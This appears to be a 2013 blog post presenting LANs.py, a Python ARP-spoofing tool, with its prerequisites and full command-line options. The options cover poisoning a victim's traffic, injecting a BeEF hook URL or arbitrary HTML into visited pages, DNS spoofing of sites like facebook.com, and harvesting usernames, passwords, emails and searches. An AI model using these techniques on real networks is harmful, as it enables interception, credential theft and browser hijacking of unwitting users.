Wednesday, 13 November 2013

[LANs.py] Capture and inject traffic on LAN

Multithreaded asynchronous packet parsing/injecting arp spoofer.

Individually arpspoofs the target box, router and DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.

Prereqs: Linux, scapy, python nfqueue-bindings 0.4.3+, aircrack-ng, python twisted, BeEF (optional), and a wireless card capable of promiscuous mode if you don't use the -ip option

Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.


All options:
python LANs.py -h
-b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
-c 'HTML CODE': inject arbitrary html code into pages the victim visits; include the quotes when selecting HTML to inject
-d: open an xterm with driftnet to see all images they view
-dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
-u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting
-i INTERFACE: specify interface; default is first interface in ip route, eg: -i wlan0
-ip: target this IP address
-n: performs a quick nmap scan of the target
-na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
-p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
-pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument
-rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it
-rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it
-v: show verbose URLs which do not truncate at 150 characters like -u
Cleans the following on Ctrl-C:
--Turn off IP forwarding
--Flush iptables firewall
--Individually restore each machine's ARP table


No comments:

Post a Comment